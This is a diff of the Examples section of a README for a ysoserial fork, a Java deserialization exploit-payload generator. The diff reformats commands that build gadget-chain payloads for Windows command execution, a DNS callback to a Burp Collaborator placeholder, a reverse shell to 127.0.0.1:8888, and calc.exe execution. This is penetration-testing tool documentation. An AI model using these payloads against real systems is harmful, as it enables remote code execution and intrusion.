TommyMandex/ysoserial/README.md

 ### Examples

-// Generate a CommonsCollections1 payload to execute commands on Windows and encode it in base64+URL java -jar ysoserial-fd-0.0.6.jar CommonsCollections1 "echo AAA > a.txt" exec_win base64,url_encoding
+\# To generate a CommonsCollections1 payload that executes commands on Windows and encode it in base64+URL:

+    java -jar ysoserial-fd-0.0.6.jar CommonsCollections1 "echo AAA > a.txt" exec_win base64,url_encoding

-// Generate a Jdk7u21 payload to execute a sleep of 10 seconds and output it in XML using XStream java -jar ysoserial-fd-0.0.6.jar Jdk7u21 10000 sleep xstream
+\# To generate a Jdk7u21 payload that executes a sleep of 10 seconds and output it in XML using XStream:

+    java -jar ysoserial-fd-0.0.6.jar Jdk7u21 10000 sleep xstream

-// Generate a DNS resolution payload to a collaborator URL and encode it with gzip+ASCII-HEX java -jar ysoserial-fd-0.0.6.jar Spring1 "yourcollaboratorpayload.burpcollaborator.net" dns gzip,ascii_hex
+\# To generate a DNS resolution payload with a collaborator URL, encoding it with gzip+ASCII-HEX:

+    java -jar ysoserial-fd-0.0.6.jar Spring1 "yourcollaboratorpayload.burpcollaborator.net" dns gzip,ascii_hex

-// Generate a pure Java reverse shell and output in plain binary java -jar ysoserial-fd-0.0.6.jar CommonsCollections2 "127.0.0.1:8888" reverse_shell
+\# To generate a pure Java reverse shell, output in plain binary:

+    java -jar ysoserial-fd-0.0.6.jar CommonsCollections2 "127.0.0.1:8888" reverse_shell

-// Generate a payload using ysoserial default (the two commands are the same): java -jar ysoserial-fd-0.0.6.jar ROME "calc.exe" java -jar ysoserial-fd-0.0.6.jar ROME "calc.exe" exec_global
+\# To generate a payload using ysoserial default (the two commands are the same, exec_global is the default):

+    java -jar ysoserial-fd-0.0.6.jar ROME "calc.exe"
+    java -jar ysoserial-fd-0.0.6.jar ROME "calc.exe" exec_global

 ## Description